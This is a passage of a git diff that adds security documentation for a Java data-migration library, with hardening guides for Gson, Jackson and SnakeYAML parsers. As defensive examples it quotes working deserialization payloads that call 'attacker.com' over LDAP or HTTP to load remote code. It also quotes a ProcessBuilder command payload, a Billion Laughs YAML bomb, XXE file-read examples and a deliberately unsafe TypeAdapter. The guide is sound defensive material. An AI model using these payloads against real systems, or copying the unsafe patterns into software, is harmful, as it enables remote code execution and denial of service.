private final AetherDataFixer fixer; + private final Duration timeout; + + public VirtualThreadMigrationService(AetherDataFixer fixer, Duration timeout) { + this.fixer = fixer; + this.timeout = timeout; + } + + public TaggedDynamic migrateWithTimeout( + TaggedDynamic input, + DataVersion from, + DataVersion to) throws TimeoutException { + + try (var executor = Executors.newVirtualThreadPerTaskExecutor()) { + Future> future = executor.submit( + () -> fixer.update(input, from, to) + ); + return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS); + } catch (TimeoutException e) { + throw new MigrationTimeoutException("Migration timed out", e); + } catch (Exception e) { + throw new MigrationException("Migration failed", e); + } + } +} +``` + +--- + +## Memory Limits + +Limit JVM memory to contain resource exhaustion attacks: + +```bash +# Limit heap size +java -Xmx512m -Xms256m -jar application.jar + +# Enable GC logging for monitoring +java -Xlog:gc*:file=gc.log:time -jar application.jar +``` + +### Monitoring Memory During Migration + +```java +public class MemoryMonitor { + + private static final long WARNING_THRESHOLD = 0.8; // 80% of max heap + + public void checkMemoryBeforeMigration() { + Runtime runtime = Runtime.getRuntime(); + long maxMemory = runtime.maxMemory(); + long usedMemory = runtime.totalMemory() - runtime.freeMemory(); + + if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) { + // Trigger GC and recheck + System.gc(); + usedMemory = runtime.totalMemory() - runtime.freeMemory(); + + if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) { + throw new InsufficientMemoryException( + "Insufficient memory for migration. Used: " + + usedMemory + "/" + maxMemory); + } + } + } +} +``` + +--- + +## Sandboxing Strategies + +For high-risk scenarios, isolate migration processing: + +### Process Isolation + +Run migrations in a separate process with limited privileges: + +```java +public class ProcessIsolatedMigration { + + public String migrateInSandbox(String input, String bootstrapClass) throws Exception { + ProcessBuilder pb = new ProcessBuilder( + "java", + "-Xmx256m", + "-cp", "migration-worker.jar", + "com.example.MigrationWorker", + bootstrapClass + ); + + pb.environment().put("JAVA_TOOL_OPTIONS", ""); // Clear environment + pb.redirectErrorStream(true); + + Process process = pb.start(); + process.getOutputStream().write(input.getBytes()); + process.getOutputStream().close(); + + if (!process.waitFor(30, TimeUnit.SECONDS)) { + process.destroyForcibly(); + throw new TimeoutException("Migration process timed out"); + } + + return new String(process.getInputStream().readAllBytes()); + } +} +``` + +### Container Isolation + +Use container limits for production: + +```yaml +# docker-compose.yml +services: + migration-worker: + image: migration-service + deploy: + resources: + limits: + memory: 512M + cpus: '0.5' + security_opt: + - no-new-privileges:true + read_only: true +``` + +--- + +## Defense-in-Depth Checklist + +Before processing untrusted data, verify: + +### Input Validation +- [ ] Input size is checked before parsing +- [ ] Content-Type header matches expected format +- [ ] Input encoding is validated (UTF-8) + +### Parser Configuration +- [ ] YAML: Using `SafeConstructor` +- [ ] YAML: Alias limit configured (`maxAliasesForCollections`) +- [ ] XML: External entities disabled +- [ ] XML: DTD processing disabled +- [ ] Jackson: Default typing is NOT enabled +- [ ] All: Nesting depth limits configured + +### Resource Limits +- [ ] Timeout configured for migration operations +- [ ] Memory limits set on JVM/container +- [ ] Rate limiting applied for user requests + +### Monitoring +- [ ] Failed migrations are logged +- [ ] Large payloads trigger alerts +- [ ] Timeout events are tracked +- [ ] Memory usage is monitored + +### Error Handling +- [ ] Errors don't expose internal details +- [ ] Stack traces are not sent to clients +- [ ] Sensitive data is not logged + +--- + +## Logging Security Events + +Log security-relevant events for monitoring: + +```java +public class SecureMigrationService { + + private static final Logger SECURITY_LOG = LoggerFactory.getLogger("SECURITY"); + + public TaggedDynamic migrate(TaggedDynamic input, DataVersion from, DataVersion to) { + long startTime = System.currentTimeMillis(); + + try { + TaggedDynamic result = fixer.update(input, from, to); + SECURITY_LOG.info("Migration success: type={}, from={}, to={}, duration={}ms", + input.type().id(), from.version(), to.version(), + System.currentTimeMillis() - startTime); + return result; + } catch (SecurityException e) { + SECURITY_LOG.warn("Migration blocked: type={}, reason={}", + input.type().id(), e.getMessage()); + throw e; + } catch (Exception e) { + SECURITY_LOG.error("Migration failed: type={}, error={}", + input.type().id(), e.getMessage()); + throw e; + } + } +} +``` + +--- + +## Complete Secure Migration Service + +Combining all best practices: + +```java +public class SecureMigrationService { + + private static final Logger LOG = LoggerFactory.getLogger(SecureMigrationService.class); + private static final long MAX_SIZE = 10 * 1024 * 1024; + private static final int MAX_DEPTH = 50; + private static final Duration TIMEOUT = Duration.ofSeconds(30); + + private final AetherDataFixer fixer; + private final ExecutorService executor; + + public SecureMigrationService(AetherDataFixer fixer) { + this.fixer = fixer; + this.executor = Executors.newCachedThreadPool(); + } + + public TaggedDynamic migrateSecurely( + byte[] untrustedInput, + DynamicOps ops, + TypeReference type, + DataVersion from, + DataVersion to) { + + // 1. Size validation + if (untrustedInput.length > MAX_SIZE) { + throw new PayloadTooLargeException("Input exceeds " + MAX_SIZE + " bytes"); + } + + // 2. Parse with safe configuration (format-specific) + T parsed = parseSecurely(untrustedInput, ops); + + // 3. Depth validation + Dynamic dynamic = new Dynamic<>(ops, parsed); + validateDepth(dynamic, 0); + + // 4. Migrate with timeout + TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic); + return migrateWithTimeout(tagged, from, to); + } + + private T parseSecurely(byte[] input, DynamicOps ops) { + // Implementation depends on ops type + // See format-specific guides + throw new UnsupportedOperationException("Implement for specific ops"); + } + + private void validateDepth(Dynamic dynamic, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("Exceeds max depth"); + } + dynamic.getMap().result().ifPresent(map -> + map.values().forEach(v -> validateDepth(v, depth + 1))); + dynamic.getList().result().ifPresent(list -> + list.forEach(e -> validateDepth(e, depth + 1))); + } + + private TaggedDynamic migrateWithTimeout( + TaggedDynamic input, DataVersion from, DataVersion to) { + Future> future = executor.submit( + () -> fixer.update(input, from, to)); + try { + return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS); + } catch (TimeoutException e) { + future.cancel(true); + throw new MigrationTimeoutException("Timeout", e); + } catch (Exception e) { + throw new MigrationException("Failed", e); + } + } +} +``` + +--- + +## Related + +- [Threat Model](threat-model.md) +- [Format-Specific Security](format-considerations/index.md) +- [Secure Configuration Examples](secure-configuration-examples.md) +- [Spring Security Integration](spring-security-integration.md) diff --git a/docs/security/format-considerations/gson.md b/docs/security/format-considerations/gson.md new file mode 100644 index 0000000..bbc497c --- /dev/null +++ b/docs/security/format-considerations/gson.md @@ -0,0 +1,309 @@ +# Gson Security + +Gson is a relatively safe JSON library with a minimal attack surface. It does not support polymorphic deserialization by default, making it less susceptible to the deserialization attacks that affect other libraries. + +## Overview + +| Risk | Severity | Mitigation | +|-----------------------------|----------|----------------------------------| +| Large Payload DoS | Medium | Pre-validate size before parsing | +| Deep Nesting Stack Overflow | Medium | Validate nesting depth | +| Custom TypeAdapter Risks | Low | Review custom adapters carefully | + +## Safe by Default + +Unlike Jackson, Gson does **not** support polymorphic deserialization by default: + +```java +// This is SAFE - Gson doesn't instantiate arbitrary classes +Gson gson = new Gson(); +MyClass obj = gson.fromJson(untrustedJson, MyClass.class); +``` + +Gson only deserializes to the explicitly specified type (`MyClass`), not types specified in the JSON payload. + +## Potential Risks + +### Large Payload DoS + +Gson will attempt to parse any JSON regardless of size. Very large payloads can cause memory exhaustion: + +```java +// No built-in size limits +Gson gson = new Gson(); +// This will try to parse a 1GB JSON string +JsonElement element = JsonParser.parseString(hugeJson); // Potential OOM +``` + +### Deep Nesting Stack Overflow + +Deeply nested JSON can cause stack overflow during parsing: + +```json +{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":...}}}}}}}}} +``` + +--- + +## Secure Configuration + +### Pre-Validation Before Parsing + +Always validate input before parsing: + +```java +public class SecureGsonParser { + + private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB + private static final int MAX_DEPTH = 50; + + private final Gson gson; + + public SecureGsonParser() { + this.gson = new GsonBuilder() + .disableHtmlEscaping() // Optional: for data migration + .create(); + } + + public JsonElement parse(String json) { + // Validate size + if (json.length() > MAX_SIZE) { + throw new SecurityException("JSON exceeds maximum size"); + } + + // Parse + JsonElement element = JsonParser.parseString(json); + + // Validate depth + validateDepth(element, 0); + + return element; + } + + private void validateDepth(JsonElement element, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("JSON exceeds maximum nesting depth"); + } + + if (element.isJsonObject()) { + for (Map.Entry entry : element.getAsJsonObject().entrySet()) { + validateDepth(entry.getValue(), depth + 1); + } + } else if (element.isJsonArray()) { + for (JsonElement item : element.getAsJsonArray()) { + validateDepth(item, depth + 1); + } + } + } +} +``` + +### Integration with GsonOps + +```java +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; + +public class SecureGsonMigration { + + private static final long MAX_SIZE = 10 * 1024 * 1024; + private static final int MAX_DEPTH = 50; + + public Dynamic parseSecurely(String json) { + // 1. Size validation + if (json.length() > MAX_SIZE) { + throw new SecurityException("JSON exceeds maximum size"); + } + + // 2. Parse + JsonElement element = JsonParser.parseString(json); + + // 3. Depth validation + validateDepth(element, 0); + + // 4. Wrap in Dynamic + return new Dynamic<>(GsonOps.INSTANCE, element); + } + + private void validateDepth(JsonElement element, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("JSON exceeds maximum nesting depth"); + } + + if (element.isJsonObject()) { + element.getAsJsonObject().entrySet() + .forEach(e -> validateDepth(e.getValue(), depth + 1)); + } else if (element.isJsonArray()) { + element.getAsJsonArray() + .forEach(e -> validateDepth(e, depth + 1)); + } + } +} +``` + +--- + +## Streaming Parser for Large Files + +For very large files, use Gson's streaming API with validation: + +```java +import com.google.gson.stream.JsonReader; + +public class StreamingGsonParser { + + private static final int MAX_DEPTH = 50; + private int currentDepth = 0; + + public void parseWithDepthLimit(Reader input) throws IOException { + try (JsonReader reader = new JsonReader(input)) { + parseValue(reader); + } + } + + private void parseValue(JsonReader reader) throws IOException { + switch (reader.peek()) { + case BEGIN_OBJECT -> { + checkDepth(); + currentDepth++; + reader.beginObject(); + while (reader.hasNext()) { + reader.nextName(); + parseValue(reader); + } + reader.endObject(); + currentDepth--; + } + case BEGIN_ARRAY -> { + checkDepth(); + currentDepth++; + reader.beginArray(); + while (reader.hasNext()) { + parseValue(reader); + } + reader.endArray(); + currentDepth--; + } + case STRING -> reader.nextString(); + case NUMBER -> reader.nextDouble(); + case BOOLEAN -> reader.nextBoolean(); + case NULL -> reader.nextNull(); + default -> throw new IllegalStateException("Unexpected token"); + } + } + + private void checkDepth() { + if (currentDepth >= MAX_DEPTH) { + throw new SecurityException("Maximum nesting depth exceeded"); + } + } +} +``` + +--- + +## Custom TypeAdapter Security + +If you use custom `TypeAdapter` implementations, review them for security: + +```java +// DANGEROUS - Deserializes arbitrary classes +public class UnsafeTypeAdapter extends TypeAdapter { + @Override + public Object read(JsonReader in) { + String className = in.nextString(); + return Class.forName(className).newInstance(); // VULNERABLE! + } +} + +// SAFE - Only handles known types +public class SafeTypeAdapter extends TypeAdapter { + @Override + public MyClass read(JsonReader in) { + // Only deserialize to MyClass, not arbitrary types + return new MyClass(in.nextString()); + } +} +``` + +--- + +## Complete Secure Service + +```java +public class SecureGsonMigrationService { + + private static final long MAX_SIZE = 10 * 1024 * 1024; + private static final int MAX_DEPTH = 50; + + private final AetherDataFixer fixer; + private final Gson gson; + + public SecureGsonMigrationService(AetherDataFixer fixer) { + this.fixer = fixer; + this.gson = new GsonBuilder().create(); + } + + public TaggedDynamic migrate( + String untrustedJson, + TypeReference type, + DataVersion from, + DataVersion to) { + + // Validate + validateInput(untrustedJson); + + // Parse + JsonElement element = JsonParser.parseString(untrustedJson); + validateDepth(element, 0); + + // Migrate + Dynamic dynamic = new Dynamic<>(GsonOps.INSTANCE, element); + TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic); + return fixer.update(tagged, from, to); + } + + private void validateInput(String json) { + if (json == null || json.isEmpty()) { + throw new IllegalArgumentException("JSON input cannot be null or empty"); + } + if (json.length() > MAX_SIZE) { + throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE + " bytes"); + } + } + + private void validateDepth(JsonElement element, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH); + } + if (element.isJsonObject()) { + element.getAsJsonObject().entrySet() + .forEach(e -> validateDepth(e.getValue(), depth + 1)); + } else if (element.isJsonArray()) { + element.getAsJsonArray() + .forEach(e -> validateDepth(e, depth + 1)); + } + } +} +``` + +--- + +## Comparison with Jackson + +| Feature | Gson | Jackson | +|--------------------------------|---------------------------|---------------------------------| +| Polymorphic Deserialization | Not supported by default | Opt-in (dangerous if enabled) | +| Built-in Size Limits | No | Yes (StreamReadConstraints) | +| Built-in Depth Limits | No | Yes (StreamReadConstraints) | +| Attack Surface | Small | Larger | +| Recommended for Untrusted Data | Yes (with pre-validation) | Yes (with proper configuration) | + +--- + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [JSON Support](../../codec/json.md) +- [Secure Configuration Examples](../secure-configuration-examples.md) diff --git a/docs/security/format-considerations/index.md b/docs/security/format-considerations/index.md new file mode 100644 index 0000000..1e90c8c --- /dev/null +++ b/docs/security/format-considerations/index.md @@ -0,0 +1,105 @@ +# Format-Specific Security Considerations + +Each serialization format supported by Aether Datafixers has unique security characteristics. This section provides detailed guidance for secure configuration of each format. + +## Risk Summary + +| Format | Library | Risk Level | Primary Concerns | +|--------|-----------|--------------|-----------------------------------------------| +| YAML | SnakeYAML | **Critical** | Arbitrary code execution, Billion Laughs | +| YAML | Jackson | Low-Medium | Depth limits only | +| XML | Jackson | **High** | XXE, Entity expansion | +| JSON | Jackson | Medium | Polymorphic typing (if enabled), depth limits | +| JSON | Gson | Low | Minimal attack surface | +| TOML | Jackson | Low | Limited attack surface | + +## Format-Specific Guides + +### [SnakeYAML Security](snakeyaml.md) + +**Risk Level: Critical** + +SnakeYAML's default configuration allows arbitrary Java class instantiation, making it extremely dangerous for untrusted input. This guide covers: + +- Arbitrary code execution prevention +- Billion Laughs attack mitigation +- Safe `LoaderOptions` configuration +- Complete secure setup example + +### [Jackson Security](jackson.md) + +**Risk Level: Medium-High (format dependent)** + +Jackson is used for JSON, YAML, XML, and TOML. Security considerations vary by format: + +- **JSON:** Polymorphic deserialization risks +- **YAML:** Fewer risks than SnakeYAML (no arbitrary constructors) +- **XML:** XXE vulnerabilities +- **All:** Depth and size limits + +### [Gson Security](gson.md) + +**Risk Level: Low** + +Gson has a relatively small attack surface by default. This guide covers: + +- Safe default behavior +- Pre-validation recommendations +- Depth validation patterns + +## Quick Reference + +### SnakeYAML: Always Use SafeConstructor + +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); + +Yaml safeYaml = new Yaml(new SafeConstructor(options)); +``` + +### Jackson XML: Disable External Entities + +```java +XMLInputFactory xmlFactory = XMLInputFactory.newFactory(); +xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); +xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); +``` + +### Jackson JSON: Configure Read Constraints + +```java +StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); +``` + +### Jackson: Never Enable Default Typing + +```java +// DANGEROUS - Never do this with untrusted data: +// mapper.enableDefaultTyping(); + +// DANGEROUS - Also avoid: +// mapper.activateDefaultTyping(mapper.getPolymorphicTypeValidator()); +``` + +## Decision Matrix + +Use this matrix to determine which security measures to apply: + +| Data Source | SnakeYAML | Jackson JSON | Jackson XML | Gson | +|-------------------|--------------------------|-----------------|----------------|----------------| +| User uploads | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| External APIs | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| Message queues | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| Internal services | Consider SafeConstructor | Optional limits | XXE prevention | Default OK | +| Local config | Default OK | Default OK | Default OK | Default OK | + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [Secure Configuration Examples](../secure-configuration-examples.md) diff --git a/docs/security/format-considerations/jackson.md b/docs/security/format-considerations/jackson.md new file mode 100644 index 0000000..1fc7cac --- /dev/null +++ b/docs/security/format-considerations/jackson.md @@ -0,0 +1,328 @@ +# Jackson Security + +Jackson is used by Aether Datafixers for JSON, YAML, XML, and TOML via `JacksonJsonOps`, `JacksonYamlOps`, `JacksonXmlOps`, and `JacksonTomlOps`. Each format has specific security considerations. + +## Overview + +| Format | Ops Class | Risk Level | Key Concerns | +|--------|------------------|------------|-------------------------------------| +| JSON | `JacksonJsonOps` | Medium | Polymorphic typing, resource limits | +| YAML | `JacksonYamlOps` | Low-Medium | Fewer features than SnakeYAML | +| XML | `JacksonXmlOps` | **High** | XXE, Entity expansion | +| TOML | `JacksonTomlOps` | Low | Minimal attack surface | + +--- + +## Polymorphic Deserialization + +### The Vulnerability + +Jackson's "default typing" feature allows JSON to specify which Java class to instantiate. This is extremely dangerous with untrusted input: + +```java +// DANGEROUS - Never do this with untrusted data +ObjectMapper mapper = new ObjectMapper(); +mapper.enableDefaultTyping(); // VULNERABLE! +``` + +Attackers can exploit this to execute arbitrary code: + +```json +{ + "@class": "com.sun.rowset.JdbcRowSetImpl", + "dataSourceName": "ldap://attacker.com/exploit", + "autoCommit": true +} +``` + +### Safe Configuration + +**Never enable default typing for untrusted data:** + +```java +// SAFE - Default configuration (no polymorphic typing) +ObjectMapper mapper = new ObjectMapper(); +// Do NOT call enableDefaultTyping() or activateDefaultTyping() +``` + +**If polymorphic typing is absolutely required**, use an allowlist: + +```java +ObjectMapper mapper = new ObjectMapper(); +mapper.activateDefaultTyping( + BasicPolymorphicTypeValidator.builder() + .allowIfSubType(SafeBaseClass.class) // Only allow specific types + .build(), + ObjectMapper.DefaultTyping.NON_FINAL +); +``` + +--- + +## StreamReadConstraints (Jackson 2.15+) + +Jackson 2.15+ provides `StreamReadConstraints` to limit resource consumption: + +```java +import com.fasterxml.jackson.core.JsonFactory; +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.databind.ObjectMapper; + +StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) // Prevent stack overflow + .maxNumberLength(100) // Limit number string length + .maxStringLength(1_000_000) // 1MB max string + .maxNameLength(50_000) // Limit field name length + .maxDocumentLength(10_000_000) // 10MB max document (Jackson 2.16+) + .build(); + +JsonFactory factory = JsonFactory.builder() + .streamReadConstraints(constraints) + .build(); + +ObjectMapper safeMapper = new ObjectMapper(factory); +``` + +### Constraint Reference + +| Constraint | Default | Recommended | Purpose | +|---------------------|-----------|-------------|-----------------------------| +| `maxNestingDepth` | 1000 | 50-100 | Prevent stack overflow | +| `maxStringLength` | 20MB | 1-10MB | Limit memory per string | +| `maxNumberLength` | 1000 | 100 | Prevent huge number strings | +| `maxNameLength` | 50000 | 1000 | Limit field name length | +| `maxDocumentLength` | unlimited | 10MB | Total document size | + +--- + +## XXE Prevention + +### The Vulnerability + +XML External Entity (XXE) attacks allow attackers to: +- Read local files (`file:///etc/passwd`) +- Perform SSRF (`http://internal-server/`) +- Cause DoS via entity expansion + +```xml + + +]> +&xxe; +``` + +### Secure JacksonXmlOps Configuration + +```java +import com.fasterxml.jackson.dataformat.xml.XmlFactory; +import com.fasterxml.jackson.dataformat.xml.XmlMapper; +import javax.xml.stream.XMLInputFactory; + +public class SecureXmlMapperFactory { + + public static XmlMapper createSecureXmlMapper() { + // Create secure XMLInputFactory + XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); + + // Disable external entities (XXE prevention) + xmlInputFactory.setProperty( + XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); + + // Disable DTD processing + xmlInputFactory.setProperty( + XMLInputFactory.SUPPORT_DTD, false); + + // Disable entity reference replacement + xmlInputFactory.setProperty( + XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false); + + // Build secure XmlMapper + return XmlMapper.builder( + XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .build() + ).build(); + } +} + +// Usage with JacksonXmlOps +XmlMapper secureMapper = SecureXmlMapperFactory.createSecureXmlMapper(); +JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper); +``` + +### XMLInputFactory Properties Reference + +| Property | Value | Purpose | +|----------|-------|---------| +| `IS_SUPPORTING_EXTERNAL_ENTITIES` | `false` | Block external entity loading | +| `SUPPORT_DTD` | `false` | Disable DTD processing entirely | +| `IS_REPLACING_ENTITY_REFERENCES` | `false` | Don't expand entities | +| `IS_VALIDATING` | `false` | Skip DTD validation | + +--- + +## Complete Secure Configurations + +### Secure JacksonJsonOps + +```java +import com.fasterxml.jackson.core.JsonFactory; +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.databind.ObjectMapper; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; + +public class SecureJacksonJsonConfig { + + public static JacksonJsonOps createSecureOps() { + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxNumberLength(100) + .maxStringLength(1_000_000) + .build(); + + JsonFactory factory = JsonFactory.builder() + .streamReadConstraints(constraints) + .build(); + + ObjectMapper mapper = new ObjectMapper(factory); + + return new JacksonJsonOps(mapper); + } +} + +// Usage +JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps(); +JsonNode node = secureOps.mapper().readTree(untrustedJson); +Dynamic dynamic = new Dynamic<>(secureOps, node); +``` + +### Secure JacksonYamlOps + +```java +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; +import com.fasterxml.jackson.dataformat.yaml.YAMLMapper; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; + +public class SecureJacksonYamlConfig { + + public static JacksonYamlOps createSecureOps() { + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + + YAMLFactory factory = YAMLFactory.builder() + .streamReadConstraints(constraints) + .build(); + + YAMLMapper mapper = new YAMLMapper(factory); + + return new JacksonYamlOps(mapper); + } +} +``` + +### Secure JacksonXmlOps + +```java +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.dataformat.xml.XmlFactory; +import com.fasterxml.jackson.dataformat.xml.XmlMapper; +import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps; +import javax.xml.stream.XMLInputFactory; + +public class SecureJacksonXmlConfig { + + public static JacksonXmlOps createSecureOps() { + // Secure XML parsing + XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); + xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); + xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); + xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false); + + // Resource limits + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + + XmlFactory factory = XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .streamReadConstraints(constraints) + .build(); + + XmlMapper mapper = XmlMapper.builder(factory).build(); + + return new JacksonXmlOps(mapper); + } +} +``` + +--- + +## Deserialization Features + +Additional security-relevant features: + +```java +ObjectMapper mapper = new ObjectMapper(); + +// Fail on unknown properties (defense in depth) +mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, true); + +// Fail on null for primitives +mapper.configure(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES, true); + +// Fail on missing creator properties +mapper.configure(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES, true); +``` + +--- + +## Testing Security Configuration + +```java +@Test +void rejectsXxeAttack() { + String xxePayload = """ + + + ]> + &xxe; + """; + + JacksonXmlOps secureOps = SecureJacksonXmlConfig.createSecureOps(); + + assertThrows(Exception.class, () -> + secureOps.mapper().readTree(xxePayload) + ); +} + +@Test +void rejectsDeeplyNestedJson() { + // Create deeply nested JSON + StringBuilder json = new StringBuilder(); + for (int i = 0; i < 100; i++) json.append("{\"a\":"); + json.append("1"); + for (int i = 0; i < 100; i++) json.append("}"); + + JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps(); + + assertThrows(StreamConstraintsException.class, () -> + secureOps.mapper().readTree(json.toString()) + ); +} +``` + +--- + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [JSON Support](../../codec/json.md) +- [XML Support](../../codec/xml.md) +- [YAML Support](../../codec/yaml.md) diff --git a/docs/security/format-considerations/snakeyaml.md b/docs/security/format-considerations/snakeyaml.md new file mode 100644 index 0000000..6706754 --- /dev/null +++ b/docs/security/format-considerations/snakeyaml.md @@ -0,0 +1,316 @@ +# SnakeYAML Security + +> **CRITICAL WARNING:** SnakeYAML's default configuration allows arbitrary Java class instantiation, +> which can lead to **Remote Code Execution (RCE)**. Never use the default `Yaml()` constructor +> with untrusted input. + +## Overview + +SnakeYAML is a powerful YAML parser that supports YAML 1.1 features including custom tags and constructors. However, this power comes with significant security risks when processing untrusted data. + +| Risk | Severity | Mitigation | +|----------------------------------|--------------|----------------------------------| +| Arbitrary Code Execution | **Critical** | Use `SafeConstructor` | +| Billion Laughs (Alias Expansion) | High | Limit `maxAliasesForCollections` | +| Stack Overflow | Medium | Limit `nestingDepthLimit` | +| Resource Exhaustion | Medium | Limit `codePointLimit` | + +## Arbitrary Code Execution + +### The Vulnerability + +SnakeYAML's default constructor can instantiate arbitrary Java classes using YAML tags: + +```yaml +# This YAML can execute arbitrary code with default Yaml() +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker.com/malicious.jar"] + ]] +] +``` + +When parsed with `new Yaml().load(input)`, this: +1. Creates a `URLClassLoader` pointing to an attacker's server +2. Loads a malicious JAR file +3. Instantiates `ScriptEngineManager` with the malicious classloader +4. Executes arbitrary code on your server + +### Other Dangerous Payloads + +```yaml +# Execute shell command (via ProcessBuilder) +!!java.lang.ProcessBuilder [["calc.exe"]] + +# JNDI injection +!!com.sun.rowset.JdbcRowSetImpl + dataSourceName: "ldap://attacker.com/exploit" + autoCommit: true +``` + +### The Solution: SafeConstructor + +**Always** use `SafeConstructor` when parsing untrusted YAML: + +```java +import org.yaml.snakeyaml.Yaml; +import org.yaml.snakeyaml.constructor.SafeConstructor; +import org.yaml.snakeyaml.LoaderOptions; + +// UNSAFE - Never do this with untrusted input: +// Yaml yaml = new Yaml(); + +// SAFE - Always use SafeConstructor: +Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); +Object data = yaml.load(untrustedInput); +``` + +`SafeConstructor` only allows construction of basic Java types: +- `String`, `Integer`, `Long`, `Double`, `Boolean` +- `List`, `Map` +- `Date`, `byte[]` + +Any YAML with custom tags (`!!classname`) will throw an exception. + +--- + +## Billion Laughs Attack + +### The Vulnerability + +YAML aliases allow referencing previously defined anchors. Attackers can create exponentially expanding structures: + +```yaml +a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] +b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] +c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] +d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] +e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] +f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] +g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] +h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] +i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] +``` + +This small YAML file expands to **billions** of strings, consuming all available memory. + +### The Solution: Limit Alias Expansion + +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); // Default is 50, adjust as needed + +Yaml yaml = new Yaml(new SafeConstructor(options)); +``` + +With this limit, the parser throws an exception when alias expansion exceeds the threshold. + +--- + +## Complete Secure Configuration + +Use this configuration for all untrusted YAML: + +```java +import org.yaml.snakeyaml.Yaml; +import org.yaml.snakeyaml.LoaderOptions; +import org.yaml.snakeyaml.constructor.SafeConstructor; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; + +public class SecureYamlParser { + + private static final int MAX_ALIASES = 50; + private static final int MAX_DEPTH = 50; + private static final int MAX_CODE_POINTS = 3 * 1024 * 1024; // 3MB + + private final Yaml yaml; + + public SecureYamlParser() { + LoaderOptions options = new LoaderOptions(); + + // Prevent Billion Laughs attack + options.setMaxAliasesForCollections(MAX_ALIASES); + + // Prevent stack overflow from deep nesting + options.setNestingDepthLimit(MAX_DEPTH); + + // Limit total input size + options.setCodePointLimit(MAX_CODE_POINTS); + + // Reject duplicate keys (data integrity) + options.setAllowDuplicateKeys(false); + + // Use SafeConstructor to prevent RCE + this.yaml = new Yaml(new SafeConstructor(options)); + } + + public Dynamic parse(String untrustedYaml) { + Object data = yaml.load(untrustedYaml); + return new Dynamic<>(SnakeYamlOps.INSTANCE, data); + } + + public Dynamic parse(InputStream untrustedInput) { + Object data = yaml.load(untrustedInput); + return new Dynamic<>(SnakeYamlOps.INSTANCE, data); + } +} +``` + +--- + +## LoaderOptions Reference + +| Option | Default | Recommended | Purpose | +|----------------------------|---------|-------------------|---------------------------| +| `maxAliasesForCollections` | 50 | 50 or less | Prevent Billion Laughs | +| `nestingDepthLimit` | 50 | 50 or less | Prevent stack overflow | +| `codePointLimit` | 3MB | Based on use case | Limit input size | +| `allowDuplicateKeys` | true | **false** | Data integrity | +| 